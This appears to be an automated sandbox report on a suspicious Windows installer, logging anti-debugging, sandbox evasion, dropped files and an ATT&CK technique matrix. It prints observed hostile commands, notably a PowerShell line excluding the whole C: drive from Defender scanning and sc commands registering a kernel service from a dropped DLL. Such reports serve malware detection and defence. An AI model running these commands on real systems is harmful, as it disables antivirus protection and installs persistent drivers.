Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5470Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4268Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpWindow / User API: threadDelayed 687Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpWindow / User API: threadDelayed 657Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpWindow / User API: threadDelayed 610Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-RO25N.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2056Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C9FAEC0 FindFirstFileA,FindClose,FindClose,5_2_6C9FAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A66868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00A66868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A67496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00A67496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A69C60 GetSystemInfo,9_2_00A69C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000002.1789451090.00000000007B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000002.1789451090.00000000007B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C883886 NtSetInformationThread 00000000,00000011,00000000,000000005_2_6C883886
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA10181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6CA10181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_00AE57D0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA19D35 mov eax, dword ptr fs:[00000030h]5_2_6CA19D35
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA19D66 mov eax, dword ptr fs:[00000030h]5_2_6CA19D66
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA0F17D mov eax, dword ptr fs:[00000030h]5_2_6CA0F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA08CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6CA08CBD
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA10181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6CA10181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.11.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAD7720 cpuid 5_2_6CAD7720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A6AB2A GetSystemTimeAsFileTime,9_2_00A6AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00B00090 GetVersion,9_2_00B00090
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory331
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
